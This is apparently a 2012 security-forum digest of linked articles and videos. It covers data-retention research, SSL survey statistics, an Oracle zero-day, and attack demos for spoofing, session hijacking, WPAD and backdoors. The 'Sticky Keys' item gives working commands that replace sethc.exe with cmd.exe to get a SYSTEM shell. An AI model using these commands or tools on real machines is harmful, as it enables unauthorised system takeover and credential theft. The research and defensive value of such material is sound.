Nytro

Terrorists Win - Exploiting Telecommunications Data Retention Telecommunications data retention (TDR) has become a reality in most Western countries. Protagonists claim that the collection of massive amounts of data on the communication behavior of all individuals within a country would enable law enforcement agencies to exploit patterns in the stored data to uncover connections between suspects. While this is obviously true for investigations after an incident happened, there is up to now no critical and sound assessment publicly available that evaluates whether TDR brings any pro-active benefits for the above mentioned, justified purposes. In this talk we give for the first time a critical assessment of the power of TDR based on methods from information theory. To this end we have employed agent based simulations, which mimic the communication behavior of a large community including a dark-net of alleged suspects. The structure and statistics of our telecommunication simulation, which drive the dynamics of telephone calls and simulated TDR data, were generated according to known statistics of real-world telecommunications networks. Hiding in the unavoidable noise seems to be a passive strategy for terrorists to circumvent pro-active detection. This stems from a "needle in the haystack"-problem, that arises due to the small number of conspirators compared to the number of other participants. In particular situations and with adopted strategies suspected terrorists might be able to eventually exploit TDR for their purposes and take an active approach to hiding in the crowd. Such TDR exploits would lower the probability of detection by law enforcement agencies and render TDR a potential security threat. Again, we use our simulations and our analysis procedure to assess this problem. Authors Kay Hamacher Stefan Katzenbeisser Submitted May 01, 2012 Download: http://mirror.fem-net.de/CCC/27C3/mp4-h264-HQ/27c3-4055-en-terrorists_win_exploiting_telecommunications_data.mp4 Sursa: IT Security and Hacking knowledge base - SecDocs

Windows 8 Forensic Guide Download: http://propellerheadforensics.files.wordpress.com/2012/04/thomson_windows-8-forensic-guide.pdf

[h=1]SyScan 2012 Singapore[/h] Parent Directory Day1-1 Chris Valasek & Tarjei Mandt/ Day1-2 Loukas Kalenderidis/ Day1-3 Ryan MacArhur & Beist/ Day1-4 Aaron LeMasters/ Day1-5 James Burton/ Day1-6 Jon Oberheide/ Day2-10 Edgar Barbosa/ Day2-6 Alex Ionescu/ Day2-7 Stefan Esser/ Day2-8 Brett Moore/ Day2-9 Paul Craig/ Slides: http://www.xchg.info/ARTeam/conferences/SyScan%202012%20Singapore/

[h=1]Skype-iplookup[/h] Perform obscure ip lookup for online skype accounts. Can find local and remote ip address. Require craked SkypeKit with deobfuscated debug logs. Online: http://skype-ip-finder.tk/ Source code: https://github.com/zhovner/Skype-iplookup

[h=3]Announcing SSL Pulse[/h] [h=2]April 30, 2012[/h] Last week we announced SSL Pulse, a continuously updated dashboard that is designed to show the state of the SSL ecosystem at a glance. While it is possible today to deploy SSL and to deploy it well, the process is difficult: the default settings are wrong, the documentation is lacking, and the diagnostic tools are inadequate. For these reasons, we cannot say that the Web is yet secure, but we hope that someday it will be. The purpose of SSL Pulse is to bring visibility to SSL implementation issues on the Web, and while businesses are starting to fix these issues we can keep track of progress made towards making SSL more robust and widely adopted on the Internet. SSL Pulse is based on the assessment technology and testing conducted by SSL Labs. The underlying data set draws from the information on about 200,000 SSL web sites that represent the most popular web sites in the world. We cherry-picked only the most important data points, focusing especially on those aspects where improvements are needed. We have so far conducted only one round of testing, but, when the next month’s results become available, we will start to show historic values and hopefully see improvements for each data point. So what do the results tell us? Looking at the SSL Labs grades, which are designed to sum up the quality of SSL configuration, we can see that about 50% (99,903 sites) got an A, which is a good result. Previous global SSL Labs surveys reported about 33% well-configured sites, which means that more popular sites are better configured. Unfortunately, many of these A-grade sites (still) support insecure renegotiation (8,522 sites, or 8.5% of the well-configured ones) or are vulnerable to the BEAST attack (72,357 sites, or 72.4% of the well-configured ones). This leaves us with only 19,024 sites (or 9.59% of all sites) that are genuinely secure at this level of analysis. The number of sites vulnerable to insecure renegotiation is decreasing at a steady pace, as patches are applied or servers get replaced. The very high number of sites vulnerable to the BEAST attack is worrying, because this problem needs to be addressed in configuration, and that requires awareness, time, and knowledge. Plus, freshly installed systems are equally likely to be vulnerable because of the insecure defaults. Among other interesting data points, we found only 19 weak private keys in our data. There are also 9 keys that trigger our black list of weak Debian keys. The support for HTTP Strict Transport Security, which is the state of the art configuration for SSL, is at 0.85% (1,697 sites). As part of this effort, we also published an SSL/TLS Deployment Best Practices guide with clear and concise instructions to help overworked administrators and programmers spend the minimum time possible to deploy a secure site or web application. Posted by Ivan Risti? at 16:36:44 in SSL, TIM Sursa: Ivan Risti?: Announcing SSL Pulse

[h=1]Oracle discloses new zero day exploit and launches JDK for OS X[/h]by Chester Wisniewski on May 1, 2012 While some might find it amusing that a company accidentally disclosed a zero day vulnerability in its own software, you won't if you are a Oracle database administrator. Earlier this month Oracle released a "critical patch update" fixing 88 vulnerabilities in its wide assortment of database products. Unfortunately one of the fixes for its TNS Listener service had stability issues and is only going to be fixed in future versions. Still Oracle saw fit to say it was fixed, even though they have no intention of releasing a patch for it and all current versions remain vulnerable. This sounds bad enough, but it gets worse. Joxean Koret, who discovered and disclosed the vulnerability to Oracle in 2008 saw the notice that the flaw was fixed and published a proof-of-concept exploit to the Full Disclosure mailing list. Oracle isn't exactly known for getting security right, but this is downright reckless. Taking four years to fix a serious vulnerability, and even then only committing that future releases, to be named, will fix it? If you are responsible for securing Oracle DBs I would highly recommend creating extremely restrictive firewall rules for the TNS Listener service, or disable it entirely if it isn't needed in your environment. In other Oracle news, the Java JDK is now available for OS X Lion (10.7). For Java neophytes, this is not the Java Plugin/Java Web Start components that integrate with your browser to allow you to launch Java applets. It only works with 64 bit versions of Lion and is intended for development use. Earlier versions of OS X will not see a port coming from Oracle either. This might be an indication that Oracle intends to supply their own JRE/Java Plugin/Web Start for Mac users in the future, which would make it easier for OS X users to stay current without relying on Apple. Update: At approximately the same time as this article was posted Oracle released a critical update for versions 10g and 11g database products fixing this vulnerability. Sometimes light is the best disinfectant. Sursa: Oracle discloses new zero day exploit and launches JDK for OS X | Naked Security

[h=3]Privilege Escalation via "Sticky" Keys[/h] [h=2]Monday, April 30, 2012[/h] This has been documented all over, but i like things to be on the blog so i can find them... You can gain a SYSTEM shell on an application you have administrative access on or if you have physical access to the box and can boot to repair disk or linux distro and can change files. make a copy somewhere of the original on system sethc.exe copy c:\windows\system32\sethc.exe c:\ cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe copy cmd.exe into sethc.exe's place copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe or cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe Reboot, hit Shift key 5 times, SYSTEM shell will pop up, do your thing it would probably be nice to sethc.exe back when you are done. Posted by CG at 12:10 PM Sursa: Carnal0wnage & Attack Research Blog: Privilege Escalation via "Sticky" Keys

[h=4]Arp/Dns Spoofing Steal Facebook Password (Lan Environment)[/h] Description: In this video i'll show you how an attacker can steal user credentials of every site (in this case will be facebook) in a LAN environment. First of all we use SET to clone the current facebook home page and ... Security Obscurity Blog: ARP/DNS Spoofing Steal Facebook Password (LAN Environment) Follow Me: https://twitter.com/#!/SecObscurity Sursa: Arp/Dns Spoofing Steal Facebook Password (Lan Environment)

[h=4]Stealing Http Sessions With Sessionlist[/h] Description: I run through a quick demo of how to use sessionlist to sniff http session traffic. Following that I use a simple firefox plugin to spoof the data acquired to show full access to the logged in user. Target demo site is facebook.com Download:

[h=4]Ms12-020 -- Critical Vulnerability To Attack On Windows 2008 Enterprise Edition.[/h] Description: The vulnerability in Microsoft's Remote Desktop Protocol (RDP) implementation (MS12-020). Victim :- windows server 2006 x86 Enterprise Edition Sursa: Ms12-020 -- Critical Vulnerability To Attack On Windows 2008 Enterprise Edition.

[h=4]Athcon 2011 Exploiting Anti-Reversing Techniques[/h] Description: AthCon IT Security Conference Title: Exploiting Anti-Reversing Techniques: Attacking Armadillo's Loader under Xenocode Application Virtualization. Speaker: Kyriakos Economou Sursa: Athcon 2011 Exploiting Anti-Reversing Techniques

[h=4]Athcon 2011 Win32 Exploit Development With Pvefindaddr + Project Quebec[/h] Description: Athcon IT Security Conference Title: Win32 Exploit Development with pvefindaddr + Project Quebec Speaker: Peter Van Eeckhoutte Sursa: Athcon 2011 Win32 Exploit Development With Pvefindaddr + Project Quebec

[h=4]Athcon 2010 "Attacking Voip And Understanding What Cyber-Crime Is Doing"[/h] Description: "Attacking VoIP and understanding what cyber-crime is doing" Sursa: Athcon 2010 "Attacking Voip And Understanding What Cyber-Crime Is Doing"

[h=4]Athcon 2010 "The Dhcp Recession: Extended Dhcp Exhausting Attack"[/h] Description: "The DHCP Recession: Extended DHCP Exhausting attack" Sursa: Athcon 2010 "The Dhcp Recession: Extended Dhcp Exhausting Attack"

[h=4]Athcon 2010 Mobile Privacy: Tor On The Iphone And Other Unusual Devices[/h] Description: Mobile privacy: Tor on the iPhone and other unusual devices Sursa: Athcon 2010 Mobile Privacy: Tor On The Iphone And Other Unusual Devices"

[h=4]Microsoft Windows Eot Font Table Directory Integer Overflow.[/h] Description: This module exploits an integer overflow flaw in the Microsoft Windows Embedded OpenType font parsing code located in win32k.sys. Since the kernel itself parses embedded web fonts, it is possible to trigger a BSoD from a normal web page when viewed with Internet Explorer. Sursa: Microsoft Windows Eot Font Table Directory Integer Overflow.

[h=4]Intersect Framework :: Install Persistent Backdoors[/h] Description: This video demonstrates how to use the Intersect 'persistent' module to install or remove a persistent backdoor. This backdoor can be used with any of the Intersect shell modules, will survive reboots and can only be removed by using your custom Intersect script (not even root users can modify or delete the backdoor files). Intersect homepage: http://github.com/ohdae/Intersect-2.5/ Sursa: Intersect Framework :: Install Persistent Backdoors

[h=4]Social Engineer-Toolkit And Windows Credentials Editor[/h] Description: Using SET & WCE to pull passwords off a fully patched Windows 7 box running MSE. @fjhackett Sursa: Social Engineer-Toolkit And Windows Credentials Editor

[h=4]Spoofing Dns With Nmap Fast Track Script[/h] http://www.youtube.com/watch?v=uAfk-_j-EUM&feature=player_embedded Description: spoofing DNS -spoof all websites nmap fast tarck script www.4shared.com/rar/4n4nYdcO/nmapf.html Sursa: Spoofing Dns With Nmap Fast Track Script

[h=4]Dos Attack On Win8 With Hping3 (Packet Flooding)[/h] Description: DOS Attack on Win8 with Hping3 (Packet Flooding) Sursa: Dos Attack On Win8 With Hping3 (Packet Flooding)

[h=4]Arbitrary File Upload And Bypassing Protections(Dvwa)[/h] Description: in this demo , we will bypass upload protections to upload an arbitrary file, and demonstrating how can we bypass file upload protection techniques that is used in DVWA Sursa: Arbitrary File Upload And Bypassing Protections(Dvwa)

[h=4]Dns Spoofing Plus Wpad Equals Compromised[/h] Description: [[Web found this is not my video but wanted to share it with securitytube]] How hard is it for someone to insert a proxy between you and the rest of the Internet without you knowing? Will running a Mac or Linux protect you? In this episode we combine the concepts from Episode 20 with the WPAD style attack that was discussed back in Episode 17, creating a quick and easy how-to when it comes to creating a man in the middle attack that will work against any system that has Automatic Proxy Discovery enabled. This feature is sometimes thought to be a Windows specific issue, but as we demonstrate here by transparently creating a man in the middle proxy for a Mac, it really does apply everywhere. There are just a few simple pieces that you need to accomplish this attack and there are some quick and easy things that you can do to defend yourself or that you can look for during an audit. For more details and a link to the source code, please check the Blog article here: IT Security Audit: What About WPAD?/ Sursa: Dns Spoofing Plus Wpad Equals Compromised

[h=4]Using Wpad To Compromise Web Browsers / How To Protect Yourself At Starbucks![/h] Description: [[ web found i did not make this video but wanted to share it with securitytube]] WPAD is a terrific protocol for ease of configuration, but it's also a phenomenal protocol for hackers and penetration testers. This short video will describe the issue, demonstrate how it's exploited and give you quick and easy suggestions that you can use to protect your business network or protect yourself personally when you're using your web browser in Starbuck's or McDonald's! For more demonstrations, tips and tricks, visit Auditcasts. For an in-depth discussion of this issue and how to solve it, visit http://audit.sans.org/blog Sursa: Using Wpad To Compromise Web Browsers / How To Protect Yourself At Starbucks!

[h=4]Exploit Pack - Web Security 2.2[/h] http://www.youtube.com/watch?v=jCR5TSTmtJE&feature=player_embedded Description: Exploit Pack - Web Security Take control of remote browsers, steal social network credentials, obtain persistence on remote browsers, Distributed denial of service and more. Follow me on twitter: @exploitpack Skype me: juansacco Sursa: Exploit Pack - Web Security 2.2

[h=4]Ms12-027 Mscomctl Activex Buffer Overflow Metasploit Demo(Ipv6)[/h] Description: This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses “msgr3en.dll”, which will load after office got load, so the malicious file must be loaded through “File / Open” to achieve exploitation. Sursa: Ms12-027 Mscomctl Activex Buffer Overflow Metasploit Demo(Ipv6)